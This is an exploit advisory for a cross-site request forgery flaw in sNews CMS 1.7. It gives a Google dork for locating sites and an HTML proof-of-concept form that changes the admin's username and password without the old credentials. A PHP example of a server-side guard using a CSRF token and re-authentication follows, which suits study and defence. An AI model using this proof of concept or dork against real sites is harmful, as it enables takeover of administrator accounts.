# Exploit Title : Snews CMS Cross Site Request Forgery
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date : 1/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7 (latest)
#######################################################

Change Username and Password of admin
We don't need the old username and old password

<html>
<!-- CSRF PoC -->
<body>
<form name="form0" action="http://localhost/?action=process&task=changeup" method="POST">
<input type="hidden" name="uname" value="Attacker" /> <!-- new username -->
<input type="hidden" name="pass1" value="Attacker" /> <!-- new password -->
<input type="hidden" name="pass2" value="Atacker" /> <!-- repeat new password -->
<input type="hidden" name="task" value="changeup" />
<input type="submit" name="submit_pass" value="Save" />
</form>
</body>
</html>

####################################################
######### exploit by: Amir.ght #####################
####################################################
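
A server-side guard for the credential-change request shown in the PoC above, as an added example that is not part of the original advisory and is not sNews code. Only the uname, pass1, pass2 and task fields come from the PoC; the csrf and old_pass fields and both function names are assumptions made for illustration.

```php
<?php
// Added example, not sNews code: guard for a credential-change handler like
// the PoC's task=changeup. Only uname, pass1, pass2 and task come from the
// PoC; csrf, old_pass and both function names are hypothetical.

function csrf_token(array &$session): string
{
    // One token per session, drawn from a CSPRNG and embedded in the real form.
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function check_changeup(array $session, array $post, string $method, string $currentHash): array
{
    $errors = [];
    if ($method !== 'POST') {
        $errors[] = 'method';
    }
    // A cross-site form cannot read the session-bound token, so it cannot send it.
    $sent = $post['csrf'] ?? '';
    if (empty($session['csrf']) || !is_string($sent) || !hash_equals($session['csrf'], $sent)) {
        $errors[] = 'csrf';
    }
    // Re-authenticate: the advisory notes the old password is never requested.
    $old = $post['old_pass'] ?? '';
    if (!is_string($old) || !password_verify($old, $currentHash)) {
        $errors[] = 'old_pass';
    }
    $p1 = $post['pass1'] ?? '';
    if (!is_string($p1) || $p1 === '' || $p1 !== ($post['pass2'] ?? null)) {
        $errors[] = 'pass_mismatch';
    }
    return $errors; // empty array means the change may proceed
}

// Constructed sample data: a session, a stored hash, and two requests.
$session = [];
$token   = csrf_token($session);
$hash    = password_hash('current-secret', PASSWORD_DEFAULT);
$forged  = ['uname' => 'x', 'pass1' => 'new', 'pass2' => 'new', 'task' => 'changeup'];
$legit   = $forged + ['csrf' => $token, 'old_pass' => 'current-secret'];

echo 'forged: ', json_encode(check_changeup($session, $forged, 'POST', $hash)), PHP_EOL;
echo 'legit:  ', json_encode(check_changeup($session, $legit, 'POST', $hash)), PHP_EOL;
```

The forged request has the same field set as the PoC form and is rejected for the missing token and missing current password; the second request carries both and passes.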